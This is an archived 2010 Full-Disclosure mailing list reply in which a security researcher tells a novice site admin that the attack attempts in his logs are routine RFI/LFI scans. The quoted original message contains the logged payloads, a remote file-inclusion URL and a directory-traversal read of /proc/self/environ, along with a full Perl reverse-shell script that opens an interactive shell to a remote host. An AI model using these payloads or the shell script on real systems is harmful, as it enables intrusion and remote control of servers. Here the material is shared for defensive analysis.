lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Sun, 11 Jul 2010 21:39:15 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <mrx@...pergander.org.uk>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Using of the sites for attacks on other sites

Hello Dave!

Soon I'll answer on comments of Chris and Sebastien on this topic, but first
I'll answer to your letter. Just only one ask, next time when you'll be
responding to the list at my letter, please, sent a copy of it to my e-mail.
So I'll be knowing about it.

> I have been witnessing such attacks in the past few weeks.

Man, it's another type of attacks. In my article, which I talked about in my
letter to the list, I wrote about using of Abuse of Functionality
vulnerabilities to attack other sites. So different sites become a tool in
hand of attacker to conduct attacks (including DoS and DDoS) on other sites.
I'll write soon additional information about such attacks concerning my last
researches in this topic.

> Most of the urls are trying to exploit components of web software that I
> do not have installed.

In your case we have different type of attacks then described in my article.
And I saw such attacks for many years - I had many such attacks every day
(up to few hundreds per day) at my site from July 2006 and till now. It's
just people, mostly script kiddies, are looking for known vulnerabilities at
the site. And they will not find any of them, if your site is secure.

Particularly, they are looking for know RFI and LFI vulnerabilities in
different web applications. In the first of your examples you can see that
attacker was trying to including back.txt from remote server.

So in all these attacks there are no other sites which were using to attack
your site, it was just scripts which were hosted at different sites
(particularly hacked sites), to include or download them to your server for
execution. So if you have not such vulnerable webapps at your site, then you
have no need to worry about it.

> I think my server is pretty secure, but I am a novice so what do I really
> know? And as such I have blocked these IP's from accessing my server.

As I said, you have no need to worry about these attacks, if you have not
such vulnerable webapps. And to ban or not to ban these IPs it's up to you.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

----- Original Message ----- 
From: mrx
Subject: Re: [Full-disclosure] Using of the sites for attacks on other sites

> I have been witnessing such attacks in the past few weeks. Most of the
> urls are trying to exploit components of web software that I do not have
> installed. Some do GET existing pages such as index.php and tag the attack
> on the end. Such attacks began about 2 weeks ago. These attacks have
> so far come from three different IP addresses. and I was getting around a
> dozen such accesses every other day. I think my server is pretty
> secure, but I am a novice so what do I really know? And as such I have
> blocked these IP's from accessing my server. FYI The originating IP's all
> have wordpress blogs on them.
>
> If anyone is interested here is one such attack:
>
> <apache2 log entry>
>
> 88.181.49.182 - - [28/Jun/2010:19:54:35 +0100] "GET
> /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://212.154.190.140/back.txt??
> HTTP/1.1" 404 220 "-" ...
>
> Here is another example:
>
> 94.199.181.165 - - [21/Jun/2010:05:36:27 +0100] "GET
> /index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../proc/self/environ
> HTTP/1.1" 200 3775 "-" ...
>
> </apache2 log entries>
>
> <cb.txt content>
>
> #!/usr/bin/perl
> use Socket;
> $cmd= "lynx";
> $system= 'echo "`uname -a`";echo "`id`";HISTFILE=/dev/null /bin/sh -i';
> $0=$cmd;
> $target=$ARGV[0];
> $port=$ARGV[1];
> $iaddr=inet_aton($target) || die("Error: $!\n");
> $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
> $proto=getprotobyname('tcp');
> socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
> connect(SOCKET, $paddr) || die("Error: $!\n");
> open(STDIN, ">&SOCKET");
> open(STDOUT, ">&SOCKET");
> open(STDERR, ">&SOCKET");
> system($system);
> close(STDIN);
> close(STDOUT);
> close(STDERR);
>
>
> </cb.txt content>
>
> If anyone would like more log entries let me know.
>
> If all this is beneath you guys.... sorry I bothered you.
>
> regards
> Dave

On 28/06/2010 21:13, MustLive wrote:
> Hello participants of Full-Disclosure!


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ